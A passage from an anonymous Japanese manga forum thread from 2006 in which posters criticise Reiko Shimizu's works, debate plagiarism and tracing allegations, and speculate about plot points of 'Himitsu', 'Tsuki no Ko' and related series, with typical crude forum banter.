最後は「うぐぅー」かwwww

709 :花と名無しさん:2006/11/09(木) 19:17:21 ID:???0
薪は長生きして最後は月に帰ると思う。

710 :花と名無しさん:2006/11/09(木) 19:37:59 ID:???0
卵は産まないの?

711 :花と名無しさん:2006/11/09(木) 20:05:08 ID:???0
産むかもしれん
もう「秘密」もこの先どうなるんだか予測がつかないからなw

712 :花と名無しさん:2006/11/09(木) 21:51:02 ID:???0
ラストは夢ヲチかもね。

713 :花と名無しさん:2006/11/09(木) 21:53:29 ID:???0
ありえそうだ・・・・

714 :花と名無しさん:2006/11/09(木) 21:53:43 ID:???0
「星が一つ滅びる+記憶喪失」オチですか。長編は全部そうだな。ヤレヤレ

715 :花と名無しさん:2006/11/09(木) 21:54:09 ID:???0
夢オチというか、全て誰かの見た映像って事にしてしまったり。

716 :花と名無しさん:2006/11/09(木) 23:11:36 ID:???0
第9のメンバー全員を殺害して死刑になった青木の脳内の映像

717 :花と名無しさん:2006/11/10(金) 00:03:31 ID:???0
それはオモロイかもw

718 :花と名無しさん:2006/11/10(金) 00:05:36 ID:???0
昨日立ち読みしたけど本当に心情描写下手だよ、清水さん…
読んでても共感も同情もなくただ不愉快になるだけ。
1巻は結構面白いと思ったんだけどな

719 :花と名無しさん:2006/11/10(金) 06:58:46 ID:???O
709-711の流れなら読んでやってもいいと思う今日このごろ

720 :花と名無しさん:2006/11/10(金) 13:10:54 ID:???0
ちょっと真面目に最終回を想像すると、薪はアボーンで最後に青木が
脳映像を見るのしか思い浮かばないな。
今まで薪が見てきた犯罪者の視界を追体験、「あの人はこんな重いものを
背負っていたのか」って青木棒涙。
最後の方に第九メンバーと青木の満面の笑みが映り、更に棒涙。

721 :花と名無しさん:2006/11/10(金) 13:21:20 ID:???0
ほんで青木が「みんなが忘れても俺が覚えてるから」とか言っちゃうんだろうなー
もうワンパターンですよワンパターン

722 :花と名無しさん:2006/11/10(金) 13:30:14 ID:???0
ワンパターンを回避するために>>716あたりを採用したりして。>シミズン
ここを見てればの話だがw

723 :花と名無しさん:2006/11/10(金) 13:32:11 ID:???0
>716を採用したとしてもきっと見るのは薪。
そして自分がいかに青木に愛されていたかを知って、棒涙。
この映像は他の誰にも見せたくない、とか言って、脳破壊。end。

724 :花と名無しさん:2006/11/10(金) 14:14:07 ID:???0
マッキーならやりそうだ。

725 :花と名無しさん:2006/11/10(金) 14:22:51 ID:???0
何にせよ棒涙はケテーイ

726 :花と名無しさん:2006/11/10(金) 17:10:12 ID:???0
棒涙がなければまだ名作扱いだったがな。

727 :花と名無しさん:2006/11/11(土) 01:34:28 ID:???0
大統領、1000歩譲って貝沼でやめときゃよかったんだよ。

728 :花と名無しさん:2006/11/11(土) 15:07:53 ID:???0
>>727にハゲド。

729 :花と名無しさん:2006/11/11(土) 19:35:40 ID:???O
竜と月と家具はどの辺でやめときゃよかったのか教えて下さいおまいら。

730 :花と名無しさん:2006/11/11(土) 19:37:23 ID:???0
全部2〜3巻くらい

長くなるほど作者の趣味とパクリが出てきてウザ

731 :花と名無しさん:2006/11/11(土) 22:44:50 ID:???0
竜は最後がだらだらしてた。
月は中だるみがひどすぎる。
家具はあんなgdgdな仕上がりなら最初から書くなって感じ。

732 :花と名無しさん:2006/11/11(土) 23:11:40 ID:???O
WILD CATSも、1話目か2話目で止めとけば…

733 :花と名無しさん:2006/11/11(土) 23:33:50 ID:???O
竜…ちょうどいい

月…アート異母兄弟絡みの話はイラネ

家具…カブチまで

734 :花と名無しさん:2006/11/13(月) 06:59:23 ID:???0 ?2BP(0)
竜はパクの集大成の作品だから問答無用で拒否反応出る
衣装背景建築構図全部元ネタあってちょっとしたひとコマまで絵画パク

ところで棒涙は汚水のトレードマークだけど
マギーとかの髪もあれなんて言えばいいのかな、なんか気持ち悪いよね
のぺっとして質感があるぶ厚めの画用紙が
幅20cmぐらいで頭頂部からこうデロンって4,5個流れてるみたいな…
う〜む表現が難しい
なんか1本1本の髪って感じがしなくてジェル状のプラスチック板が
もったり背中に流れてるような…
あれがすごく嫌

735 :花と名無しさん:2006/11/13(月) 23:25:22 ID:???O
>>734
それはそれでずいぶん極端だね…

竜はパクなんて知らない厨房の頃に深くハマったからか、
背景パクは相当ショックだったけど、ストーリーとか含めると、
家具屋なんかに比べれば断然好きな部類に入るなぁ。
絵画パクは、そのコマ自体に何か浮いてるような違和感を
前から感じてたので、呆れはしたけど、あんまショックじゃなかったしw


736 :花と名無しさん:2006/11/15(水) 02:13:46 ID:???0
パクは気が付かなかったけど、竜は好き。
コミクスで一気読みだったせいか、別に中だるみとか気にならなかった。

737 :花と名無しさん:2006/11/16(木) 10:58:16 ID:???0
当時はまだ決めゴマに萌えをぶちこむくらいで、ストーリーから脱線するほど萌えを
投入してなかったから中だるみ感は少ないのかも>竜
月の子の後半、アートの弟エピあたりから、「それイラネ」な萌え投入が目立ってきた
気がする。

738 :花と名無しさん:2006/11/16(木) 20:50:04 ID:???0
アートの弟はホントいらないね。
元ネタが好きなダンサーだけあって、やたらプッシュされてたけどね。
あまり魅力を感じなかった。
最終回での登場はよかったけど。

739 :花と名無しさん:2006/11/17(金) 14:18:01 ID:???0
弟に萌え突っ込んで、安易に幼児残酷物語を描いてる暇があったら
ギルに操られて苦悩するアートとショナの描写でもした方が
まだ話を纏められたんじゃないのか。

と最近再読して思いました。

740 :花と名無しさん:2006/11/18(土) 02:16:03 ID:???0
今どこでなにかいてるかおしえて

741 :花と名無しさん:2006/11/18(土) 21:44:32 ID:???0
>>688
そう思うとますます嫌いになる>マキ
どーこが素子さんやねん!な気持ち。


742 :花と名無しさん:2006/11/18(土) 21:47:12 ID:???0
WILDCATSのデカイ版読んだ。

この人、壊滅的に「可愛いもの」を描けないんだなあ。
気色悪い絵だった。


743 :花と名無しさん:2006/11/19(日) 07:15:19 ID:???0
攻殻確かに好きそう…

ひさびさに検証見てきたけど
なんかここまでトレスだと今日び元の絵をCGで加工したらできんじゃないの?
清水フィルタみたいな
描く意味あるのか

744 :花と名無しさん:2006/11/19(日) 17:08:53 ID:???0
劣化の仕方が気持ち悪いんだよなぁ……

もう専業主婦で育児にせいをだしなよシミズン……

745 :花と名無しさん:2006/11/19(日) 19:07:51 ID:???0
スキューバの漫画はおもしろかったよ。

面白エピソード
  +
レオンとかのトレスのきれいな絵

パクとか、トレスとかきにしないで読めるし。

ああいうの、またやらないかなあ。
育児体験漫画でもいいから。


746 :花と名無しさん:2006/11/19(日) 19:09:48 ID:???0
WILD CATSはあの女の子も気持ち悪くなかった?
あまりにDQN過ぎて(狙い以上という意味で)

線が死んでてロングの髪の毛が変だよね。


747 :花と名無しさん:2006/11/19(日) 20:32:54 ID:???0
ちょい前の話になるんだが
秘密の1巻が出た頃に、手塚治虫漫画賞の候補作に秘密が挙がってた事があって
その時の審査員の反応が、褒める人はめちゃめちゃに褒め、ある人は評価ゼロと賛否両論だったらしい。

結果的に賞は逃したんだが、あの時受賞して作品とパクがもっと公になっていれば
逆に良かったのかもしれない…と思う元・儲の漏れ。
つーか審査員のハギオモトとか絶対、パク元の写真集の事知ってたよな…

748 :花と名無しさん:2006/11/19(日) 22:45:17 ID:???0
ああいう賞は持ち回りだから長く連載してると段々候補に挙がる。

さらに、ああいう賞で少女マンガを評価するのに、「少女マンガっぽくない」
ネタであるとか絵であるとそれだけで高く評価するオサーン審査員多い。
割とありがちで、だけど嫌だなあと思うことなんだけど。

初期のドロミズさんはそれなりにSFとか(萌えだけだったかもしれないけど)
好きでやってる感じだったけれど、段々賞とか珍しい、少女マンガらしくない
と評価されることへの色気みたいなものを感じるようになった。
家具屋の頃には特にね。


749 :花と名無しさん:2006/11/19(日) 22:52:24 ID:???0
賞に興味あるかどうかはわからないけど、長くやってるわりに知名度ないとは
思ってそう。「少女まんがらしくない」と言われるのは好きそうだね。
しかし、基本の少女まんがが描けてこそ(心理描写とか)、少女まんがらしくなさが
生きてくるんだと思うんだけど。

750 :花と名無しさん:2006/11/19(日) 22:53:04 ID:???0
「確かこれは少女マンガ…これは少女マンガ…」

さむ。キモ。

751 :花と名無しさん:2006/11/19(日) 22:55:02 ID:???0
家具屋はあんなに破綻してて萌えのラレツなんだけど、確かに妙に評価狙いっつーか大作・名作
にしたかったんだろうなあ……という悲しさを感じる。

仰々しいんだよね。

752 :花と名無しさん:2006/11/19(日) 23:00:12 ID:???0
仰々しくしてるくせに
中身なしだから
こんだけたたかれるんだよ。

もとから
たいした事ないよー
って感じにしとけばいいのに。

753 :花と名無しさん:2006/11/19(日) 23:04:02 ID:???0
構成ヘタクソだし、すぐ手抜きするし、
そのくせ萌えキャラや萌えシチュ、目トレスのコマだけ気合入ってるから
もう全てがちぐはぐで見苦しい…

754 :花と名無しさん:2006/11/19(日) 23:22:35 ID:???0
仰々しく見せかけるための部品はパクリで補ってるのも問題。
グロとか、こぎれいな建物、ドレス類とかね。


755 :花と名無しさん:2006/11/20(月) 02:24:59 ID:???0
今どこでなにかいてるかおしえてーな

756 :花と名無しさん:2006/11/20(月) 14:25:12 ID:???0
萌えを組み込もうが賞を狙おうが構いません。
それが原動力となって質の高い作品が生み出せるのならば……

757 :花と名無しさん:2006/11/20(月) 14:51:37 ID:???0
パクリ、ねえ………
構図、ドレス、写真集なんかはマズイと思うけど、
解剖学的なものは仕方がないんじゃないかなあ
こればっかりは見なきゃ描けないでしょ
自分で写真撮って来るって訳にもいかないし
ダヴィンチだって見て描いた訳だし
それを一緒くたにパクリパクリって言うのはすごく違和感がある

758 :花と名無しさん:2006/11/20(月) 15:26:50 ID:???0
>>757
街並みを自分で何処からどのように撮るか考えて
写真に撮って、それをトレスするのはパクリじゃないけど
写真家の写真をトレスするのはパクリ

理科のような解剖図を見て、自分で試行錯誤して
ポーズその他考えたならともかく

ラ・スペコラ写真集という写真家が角度から何から考えて撮った
既に完成した芸術をそのままトレスすりゃ誰だって美しい【芸術モドキ】の絵は描ける

何処から撮るか
どのように撮るか

そこが大変なのにね

759 :花と名無しさん:2006/11/20(月) 15:56:41 ID:???0
月の子読んだけど、絵的にもアートがかっこいいと思えなかった
ショナのほうが見た目も役どころもかっこいいと思った
主人公より脇役のほうがかっこいいってどうよ

760 :花と名無しさん:2006/11/20(月) 18:30:21 ID:8/KPBBZI0
>>757
散々ガイシュツの話題なので過去ログ嫁。

版権フリーの解剖図はある。
版権フリーじゃなきゃ参考表記を 「きちんと」 やればいい。

それに汚水がパクったのは「解剖図」じゃない。
美術品としての価値が認められている彫像(蝋人形)、しかもそれを
写真家が撮った 「作品」
それをそのまま書き写した。
絵画や写真作品をナゾって顔だけ少女マンガ絵に挿げ替えても、そ
れはパクじゃないの?


スペコラに関して毎回沸くけど勘違いすんな、汚水。

761 :花と名無しさん:2006/11/20(月) 20:28:14 ID:???0
ダヴィンチなんか墓掘り返してまで人体の描写を追求したわけだし、
どうしても内臓が描きたいならどっかの研究室にお願いしてデッサン
させてもらうなり手はなくはないんじゃ?
そもそも解剖図を参考にするにしても、そのまんま描くのがおかしいよ。
取り入れた情報を自分が描きたい構図に合わせ、頭の中で再構築して描けばいいだけだし

762 :花と名無しさん:2006/11/20(月) 20:41:21 ID:???O
>>759
それはアートだけじゃないとオモワレ。
晶より碧や鏡やまゆが、ジミーよりセツやティルトの方がたぶん人気。
私はどっちかというとアートがいい。カルメンのホセカッコヨス。

763 :花と名無しさん:2006/11/20(月) 22:36:38 ID:???0
自分もアート派だ。
リアルタイムで読んでた頃はショナかっけーとか思ってたけど、大人になってアートの良さに気付いた。


764 :花と名無しさん:2006/11/20(月) 22:44:47 ID:???0
私も今ならアートの方がいいな

765 :花と名無しさん:2006/11/20(月) 22:52:45 ID:???0
アートは良い意味で人間らしいしね

766 :花と名無しさん:2006/11/20(月) 23:40:23 ID:???0
>取り入れた情報を自分が描きたい構図に合わせ、頭の中で再構築して描けばいいだけだし

この人、再構築って出来ない人なのかも……
本当に丸のまま写しちゃうから。

他のパクってトレスじゃなきゃそこそこ改変してるのも多いんだけどなあ。


767 :花と名無しさん:2006/11/21(火) 00:29:15 ID:???0
>>11
いかにも「私が描きましたー」って出してくる
トークであんまりパクッてない作家は語ってもパクリまくりの相手は触れない
そういうわかって盗人やってる神経はどうよ

768 :花と名無しさん:2006/11/21(火) 00:33:16 ID:???0
例えば誰かの絵に何某かの感銘を受けたとして
自分はその絵をまず模写してみる
でもって次に俯瞰、煽り、引き、アップ…と、色々とデッサンして
その中でコレだと思えるものを選んでみっちり描く

上のはあくまでも習作であって誰かに見せたりはしてないんだけど、
こういう事はしてなさそうだよなぁ…シミズン……

769 :花と名無しさん:2006/11/21(火) 00:43:52 ID:???0
仮にっつーか100万歩ほど譲歩してスペコラのを、「内臓だから!」って
擁護したい人は、アルマ・タデマとかのはどう思うのかね。

むしろあっちこそまんまじゃない?
衣装からポーズから背景から……
(しかも面倒な背景のみ一部省略ww)


770 :花と名無しさん:2006/11/21(火) 00:58:35 ID:???0
クリエイターとしてどうなのシミズン!

771 :花と名無しさん:2006/11/21(火) 02:17:54 ID:???0
>(しかも面倒な背景のみ一部省略ww)

アチャー……だな、全く。

だからってスコペラみたいに大ゴマでクライマックスにドーンと書き込むのも
なんなんだが。(増ページには呆れた)


772 :花と名無しさん:2006/11/21(火) 22:28:34 ID:???0
白い椅子に座ってるパクのシーンは
元絵と比べてえらい寸詰まりな感じがするよ

773 :花と名無しさん:2006/11/21(火) 22:34:28 ID:???0
>>771
ラ・ス「ペコ」ラな

774 :花と名無しさん:2006/11/21(火) 23:41:08 ID:???0
どこか違和感が残るシーンはパクってのは他のパク作家でもあるね。

竜の……でいうと、モ肉が湖の横のテラス(?)に座ってるシーン。
テケトーに写したようで、ベンチ部分がパース無茶苦茶。
椅子なのに座れない角度にw


775 :花と名無しさん:2006/11/22(水) 15:39:03 ID:???0
そのコマ、モニ苦の服のデザインまで一緒にマネてるから参る。
なんでそこで違う服着てるのか首かしげたよ。
パクに必死で、他のコマとの整合性まで頭が回ってない。

776 :花と名無しさん:2006/11/22(水) 16:13:54 ID:???0
>>775

そっか、何か変なシーンと思ってたけど気付いてなかったー!
そうか、唐突に服が違うのか。

泥水め……!


777 :花と名無しさん:2006/11/23(木) 01:10:37 ID:???0
「月の子」面白かったけど、ショナがセツを抱いたとき、
女性化してなかったのに身ごもったのがちょっと不思議だった。

778 :花と名無しさん:2006/11/23(木) 06:46:32 ID:???O
美人だと思うヒロインでベンジャミンがなかなか人気だった。
私もあの頃の人物絵は今でもかなり好きだな
私はセツの女性化したときの絵が綺麗すぎてびびったもん

779 :花と名無しさん:2006/11/23(木) 15:38:52 ID:???O
読み切りキスミーバンパネラの1Pは沢田ケンジこれはガチ

780 :花と名無しさん:2006/11/23(木) 15:51:45 ID:???0
綺麗な人が全員同じ顔なのが当時から笑えるところだった。

ところで耳の書き方変だな、この人。

781 :花と名無しさん:2006/11/23(木) 17:07:08 ID:???0
シミズンの描く耳は、源氏パイを模写してるんだぜ

782 :花と名無しさん:2006/11/23(木) 19:10:02 ID:???0
ブタの鼻に見える。


783 :花と名無しさん:2006/11/23(木) 19:24:00 ID:???0
手と耳が上手く描ける人は本当に画力のある人ってよく言われるよね
その点この人はどっちも描けてないな

784 :花と名無しさん:2006/11/23(木) 21:39:17 ID:???0
アートとセツが好きだったから、どのカプも微妙だった…

785 :花と名無しさん:2006/11/24(金) 01:16:09 ID:???O
アートとセツにくっついて欲しかったのか?

786 :花と名無しさん:2006/11/24(金) 22:16:44 ID:???0
いやそうじゃないだろw

787 :花と名無しさん:2006/11/25(土) 00:21:03 ID:???0
>>777
自分もそれ思った

788 :花と名無しさん:2006/11/25(土) 13:45:46 ID:???0
>777
チョット前に検証してなかったっけ。だいたい、人魚の性行為そのものがどういう仕組みなのか
はっきりしてないのが問題だとは思う。パートナーをきっちり決めるところをみると、人間と
同じなのかとも思うけど、産むのは卵だというし、どういう体なんだろう。

789 :花と名無しさん:2006/11/25(土) 13:58:39 ID:???0
>>777
250以降のレスを見てみてはどうだろう
(あくまで住人の推測に過ぎないが)

790 :花と名無しさん:2006/11/25(土) 21:55:40 ID:???0
結局どう善意に解釈しても変、で結論出ていたような気がする。

というか、うーんと前にもこれループした記憶がある。


791 :花と名無しさん:2006/11/26(日) 00:55:04 ID:???0
永遠の謎かつ終盤の見せ場だし。
新しい話題がない時はループで雑談もいいんじゃない?

792 :花と名無しさん:2006/11/26(日) 01:00:34 ID:???0
リアの時はのめり込んでたんだけどなぁ、シミズン……

793 :花と名無しさん:2006/11/26(日) 01:02:08 ID:???0
>>791
やっちゃいかんとか言ってないよ。

ただ前も出ててどうしようもなかったし、何度もループしてるよ、と。
だから興味があれば過去ログ読んでみたらいいんじゃないと思って。


794 :花と名無しさん:2006/11/26(日) 23:48:40 ID:???0
>777
FC会報の最終回記念インタビューでは、精子が体内で数日生きるという魚がいるらしく、それを知ってああ、使えるな、と思って…みたいに言ってたように記憶しているが。

795 :花と名無しさん:2006/11/27(月) 07:19:44 ID:???O
我々が疑問なのは「どこに挿れたか」ということ。

796 :花と名無しさん:2006/11/27(月) 09:43:57 ID:???0
自分は、Hシーンの「”完全に”女性化するまで・・」というショナのセリフで、
下半身は女になってるのか?と思った。
でもそれだったらセツは「待って下さい。僕はまだ・・」なんて拒まないよねえ?
やっぱりちょっと不可解なんだよなあ。

797 :花と名無しさん:2006/11/27(月) 12:40:39 ID:???0
まだ=(穴はあるけど)排卵しないから妊娠は無理

798 :花と名無しさん:2006/11/27(月) 13:31:02 ID:???0
ああ、使えるなって思っても普通はそこから設定をするんだろうなあ。

そうやって適当にモザイクするから破綻したり矛盾すんだろうな。

799 :花と名無しさん:2006/11/27(月) 16:26:36 ID:???0
人魚設定自体がファンタジーなんから、そのあたりは適当でも本当はいいと
思うんだけど、中途半端にリアルにしようとするからおかしくなるんじゃない?
ジミーたち三つ子の成長したら性が決まる、っていうのも、「そういうもの」として
ファンタジーで徹底させればいいのに、ハンパにクマノミの話を持ち出して
リアリティを出そうとするから、いざショナと性交渉した時におかしくなるんだよ。

800 :花と名無しさん:2006/11/27(月) 16:35:40 ID:???0
別にリアリティだそうとかじゃなくて、
「あっこのネタに萌えた!入れちゃえ」
程度の認識しかないと思うな、清水さんには。

801 :花と名無しさん:2006/11/27(月) 21:51:40 ID:???O
いや、クマノミシステムの話はリアリティ狙いでしょ。ビミョーにずれてるけどね。
そういえば"優性遺伝子"の使い方間違ってたな。文庫版では本来言いたかったところの"優れた遺伝子"に訂正されてるの?

802 :花と名無しさん:2006/11/27(月) 22:00:14 ID:???0
上っ面だけ見て何も考えてないからなあ。

「あ!使えそう」で設定のおかしさとか考えずに投入。
どんどん破綻。


803 :花と名無しさん:2006/11/27(月) 22:10:06 ID:???0
家具屋で、フジワラと柏木が別人ってことに、二度読みしてから気が付いたorz

804 :花と名無しさん:2006/11/27(月) 22:14:08 ID:???0
>802
月の子の最後の方も、ただバレエシーン(というか、自分が好きな
バレエポーズ)が描きたくてgdgd伸ばした臭がひどいもんなあ。
満喫で読んだ、コミクス巻末にいちいち塗り絵ギャラリーとか、
自分の好きなダンサー特集とかページ入れててさ。
描きたい絵にストーリーを当てはめて、それで話もまとまってたら
いいのに、無理があり杉

805 :花と名無しさん:2006/11/27(月) 23:11:49 ID:???0
コミクス巻末ならまだしも本編でやるからなー。

しかもあんまり綺麗じゃない。
重心狂ってて足をひねりそうなポーズとか、内股バレエなんで失笑だった当時。

この人一見綺麗なものに弱いんだけど、本当に一見なんだよね。浅い。


806 :花と名無しさん:2006/11/28(火) 10:36:28 ID:???0
>>803
!!!!!
あーでももう読み返す気しない…。

807 :花と名無しさん:2006/11/28(火) 12:14:52 ID:???0
>>777
●ショナの卵を産んだよ派
  ├女性化前からマソコがあったよ派
  │    ├産卵できないだけで下半身の構造は女といっしょだよ派
  │    └ユニセックスだから棒もあるよ派
  │    
  └女性化前はマソコはなかったよ派
        ├アナルセックルだよ派
        │   ├人魚パゥアーで精子が直腸から子宮にたどりついたよ派
        │   └女性化したときに陰部周辺に付着していた精子で妊娠したよ派
        │   
        └801穴だよ派
            └人魚パゥアーで精子が801穴から子宮(ry派
                └ところで801穴ってなんだ?派

●実はショナの卵を産めなかったんだよ派
  ├事故後、他の人魚と卵をもうけて父親はショナだと吹き込んだんだよ派
  └全部ジミーのユメだよ派


808 :花と名無しさん:2006/11/28(火) 14:17:10 ID:???O
http://i.pic.to/1sv0f
諸星大二郎の2001夜物語に出てくる竜の絵なんだけど、竜星の肉食竜ソックリ。他にもモデルにしたと思われる絵、設定なんかが沢山あった。

809 :花と名無しさん:2006/11/28(火) 16:45:41 ID:???0
>>807
まとめ乙!!
見事なまとめだ。

810 :花と名無しさん:2006/11/28(火) 17:38:05 ID:???0
>>808
PC許可お願い

811 :花と名無しさん:2006/11/28(火) 18:16:38 ID:???O
>>808
>>810
http://i.pic.to/1t5q2
貼るの失敗してたみたいなので、貼りなおしました。
魚型で毛がバサバサした竜は珍しいと思ったので。

812 :花と名無しさん:2006/11/28(火) 21:38:49 ID:???0
>>811
ありがとう、って今度は時間制限に引っかかったorz
明日まで残ってることを祈りますスンマソン…

813 :花と名無しさん:2006/11/29(水) 01:36:20 ID:???0
LaLa本誌で竜〜の
女王が王女を引き摺ってくシーンを見て号泣した自分

何も知らずに感動できたあの頃が懐かしいよ、シミズン……

814 :花と名無しさん:2006/11/29(水) 03:23:02 ID:???0
>807
ワロスww

連載時はセツ好きだった
いつまでも女性化しないのは、魔女は契約なんぞ守る気なくて
セツの身体を復活させずティルトの身体にセツの記憶か魂を注入したから、
とか考えてたw でもラスト2回で「あら女性化しちゃったわ…」ww

815 :花と名無しさん:2006/11/29(水) 08:31:11 ID:???O
諸星大二郎じゃなくて星野之宣だった…ごめん

816 :花と名無しさん:2006/11/29(水) 15:32:39 ID:???0
>星野之宣
宇宙船パクリ疑惑も出てたからこの恐竜も疑惑濃厚だ。

817 :花と名無しさん:2006/11/29(水) 16:17:26 ID:???0
そういや星野さんの宇宙船にソックリだよなー。
星野さんの宇宙船って結構独特なの多いんだけど。

SFマンガ自体が少ないのでネタ元にされた可能性大だと思う。


818 :花と名無しさん:2006/11/29(水) 20:49:20 ID:???0
かぐや姫題材の話も書いてたよね>星野之宣さん

819 :花と名無しさん:2006/11/29(水) 20:52:48 ID:???O
月に隕石ネタもあった。

820 :花と名無しさん:2006/11/29(水) 21:56:39 ID:???0
妖女伝説からイタダキだったのかもなあ。
あのエンディングの辺りとか。
いつもの、「あ!いい!使える〜♪」的ノリで。

星野さんのは短編ですごい良くできてて面白かったんだが。


821 :花と名無しさん:2006/12/01(金) 22:15:11 ID:???0
なんかまた妄想系の話がループしてるね〜(星野さんの恐竜の話じゃないよ、念のため)

シミズンのパクリ癖&ストーリー破綻も末期的だけど、
当人の心理まで見て(聞いて?)来たかのように決め付けてる人も病的。


822 :花と名無しさん:2006/12/01(金) 23:22:17 ID:???0
>>821
よく分からん。

清水にインタビューしてきて。
何でパクってんのか、その心理を。


823 :花と名無しさん:2006/12/02(土) 00:32:28 ID:???0
病的とは思わんなぁ
シミズンの場合今までの経緯が経緯だし
「萌えだけで描いてる」と思われても仕方ないと思う

でもまあ無闇にエスパーするなって事だわな

824 :花と名無しさん:2006/12/02(土) 00:53:26 ID:???0
エスパーってほどでもないしなあ。

つーか本当にどういう神経でああいうことをずーっとやってんのか、今みたいに
塩水は浅慮で適当に使っている、と考えてやるのはむしろ好意的な解釈だよww
言ってみれば仕事で泥棒してるんだからさ。


825 :花と名無しさん:2006/12/02(土) 01:12:58 ID:???0
>824
>浅慮で適当に使っている、と考えてやるのはむしろ好意的な解釈

ものすごく同意。
なんでそんなにふうに、清水が無邪気人間に思えるのか不思議。

826 :花と名無しさん:2006/12/02(土) 01:16:02 ID:???0
普通に考えると同業者や、別業者の価値のある販売物をパクってきて
自分のものだと言い張ってる、韓国みたいな存在だものね。


827 :花と名無しさん:2006/12/02(土) 03:28:44 ID:???0
そこまで悪意を持っていないといいな……せめてそうであってくれ、という願望かなあ。

自分は考えてると悲しくなるのでそう思う。


828 :花と名無しさん:2006/12/02(土) 10:12:59 ID:???0
でもホントに何も考えてないんじゃないかな
これくらいいいや…って感じで
思慮深い人なら出来ないと思うし
あと擁護じゃないけど編集の人にも責任あると思う
なんでパクリ止めたりストーリーの破綻を批判しないんだろ?
周りが何も言わないからどんどん悪循環で深みにはまっていったみたい
もちろん本人が一番わるいんだけどね

829 :花と名無しさん:2006/12/02(土) 12:04:56 ID:???0
>>803
おお!

わたしもきづいてなかったっぽい。
柏木てまゆちちだよね。
フジワラてなんだっけ?
初めの頃しかでてこなかったひとか?

830 :花と名無しさん:2006/12/02(土) 14:03:30 ID:???0
「こわいですからね、いろいろと」とかのたまう辺り
浅慮というよりは計算づくのパクっぽいよなぁ

831 :花と名無しさん:2006/12/02(土) 17:49:23 ID:???0
いやー、計算してたらファンにそんなこと垂れ流さないと思うんだが。
むしろ軽く考えているからこその発言かと思ったけどどうだろう。

832 :花と名無しさん:2006/12/02(土) 18:44:49 ID:???0
軽く考えてると思うよ。
なんと言うか、軽率なんだよね。

でも、FLの返事にもらった葉書は捨てられない…
昔はホント好きだったなぁ。自分が若かったのか

833 :花と名無しさん:2006/12/02(土) 23:37:57 ID:???0
>>831
ファン相手だからこそ、つい、気が抜けて漏らしちゃったんじゃないかなあ。
計算も緩んだような。


834 :花と名無しさん:2006/12/02(土) 23:54:20 ID:???0
>>833
しゃべってたんならぽろっと出ちゃってもまだわかるけど、直筆で書いたのに?
それで計算緩むって相当おつむもゆる(ry

835 :花と名無しさん:2006/12/03(日) 00:06:17 ID:???0
>>834
ファンクラブの会報でいつもよりも気楽になっちゃうとか失言とかは他の
作家でもよくあることだ。

末次の自演を見た後ではパク作家を無邪気な目では見られないわ。


836 :花と名無しさん:2006/12/03(日) 00:07:26 ID:???0
ファンクラブの会報の部数にもよるかもよ。

それにネットない(盛んでない)時代は作家の気も今より緩かった。



837 :花と名無しさん:2006/12/03(日) 10:00:54 ID:???0
そういうものなのか…悪いことだと多少なりとも自覚があれば
ファンにこそ一番知られちゃいけないことだろうに
そこで緩んじゃうって、それこそ怖い話だな。

838 :花と名無しさん:2006/12/03(日) 16:32:09 ID:???0
ファン相手だと甘えみたいなものが出ちゃう作家さんの方が多いかもね。
それがサービス(普段見せないものや意見も披露してしまう)になる場合もある
けれど、なかなか難しいかも。

清水は論外だけど。
あれはファンクラブの会誌なんてごく小さなものなのでつい失言、だと思う。
自分に好意的な人の集まりだから緩んじゃったんでしょ。


839 :花と名無しさん:2006/12/04(月) 16:09:06 ID:???0
失言って?
パクリを認めた発言があったの?

840 :花と名無しさん:2006/12/04(月) 20:29:51 ID:???0
>>839
検証資料倉庫の前田愛のところに載ってる
本人直筆のインタビュー回答のことだよ。

841 :花と名無しさん:2006/12/05(火) 00:05:48 ID:???O
ファンクラブって、今も活動してるのかな?
ぐぐったけど古い情報しか出て来なかった。
今も会員の人が居れば最近の発言とかも投下されるんだろうけど、
あの「怖いですからね」発言とか柱・オマケ漫画くらいしか読めないから、
清水が「どういう意識なのか」を推測できるソースが少ないんだよね〜


いまさら公式HPとかblogとか始めて、イタイ発言でもしてくれれば、
このスレも盛り上がるんだろうけどw

842 :花と名無しさん:2006/12/05(火) 01:55:24 ID:???0
前田愛の写真集「1311」の表紙と裏表紙(オクの本カテで見れる)からもパクってたよ
表紙はいつだか忘れたけど本誌連載中のモノクロ扉
裏表紙はコミクスに小さいモノクロカットとして収録されてた
もう手元にないのでウPできないけど

843 :花と名無しさん:2006/12/05(火) 15:03:31 ID:???O
例の会報というのは何部くらいの規模だったのかね。。。現役会員はいないのか〜〜〜
ネタの為に入会しようかな(ワラ

844 :花と名無しさん:2006/12/05(火) 15:59:13 ID:???0
>>840
ありがとう
パクリは、わかっててやったバレなければいい、って感じに読み取れるね。

845 :花と名無しさん:2006/12/05(火) 18:09:26 ID:???0
ファンクラブ、もうないんじゃないの?

846 :花と名無しさん:2006/12/06(水) 01:44:40 ID:???0
数年前に終了したというのを
どこかで見たが >ファンクラブ

847 :花と名無しさん:2006/12/06(水) 12:22:36 ID:???0
家具屋の破壊力ってすごいよな……

普通その作家の一番の長編大作やってる最中に消滅しないだろ、
ファンクラブ。

848 :花と名無しさん:2006/12/06(水) 18:59:11 ID:2Ii7lK980
>829
そそ。司令官って呼ばれてた。黒髪で、柏木と見分けつかんがなって感じ。

849 :花と名無しさん:2006/12/06(水) 19:07:20 ID:???0
家具屋キャラの整理しようと思ったんだけど、
・コウと倭は天人。地球人より寿命が短い。(天人なのになんで倭は
カブチの月の石のカビにやられたんだろう???)
・由は天人と地球人のハーフ
・柏木、まゆは、天人の血が混ざっている可能性蟻

で、晶はド地球人で、確かにドナーとして生まれてすぐ捨てられたり、
岡田の家では嫌なこともイパーイあっただろうが、
他のドナーのように殺されたり、身体の一部キリ取られたりした訳でもないのに、
ドナ仲間の中で一番の悲劇のヒロイソ気取りで
自分の感情にまかせて、聡(ヒロキ)の腹刺したり、李家の孤児院で
胎児売買していることを説明した部下の目を潰し、ロシアで兵隊たちの手足を豚切り、
由とはヤリながら、鏡や柏木ともなんかデレってる、という印象になってしまった。
まちがった思い込みだったら誰か訂正ヨロ・・。


850 :花と名無しさん:2006/12/06(水) 23:06:28 ID:???0
晶はなんで、竹藪で発見されたのに島で育ったんだっけ…
もう一度読めば分かるのかもしれないけど読みたくない。
聞くだけ無駄な質問だったらごめんなさい。

851 :花と名無しさん:2006/12/06(水) 23:38:55 ID:???O
ロシアの兵隊を殺したのは、拾った赤ちゃんを銃殺されたからじゃなかったっけ?
一応理由あり?



852 :花と名無しさん:2006/12/07(木) 01:56:17 ID:???O
もう売っぱらっちゃったから覚えてないな(駄作だという事以外は)
晶は竹林で拾われたり、身体能力が変に優れてたり
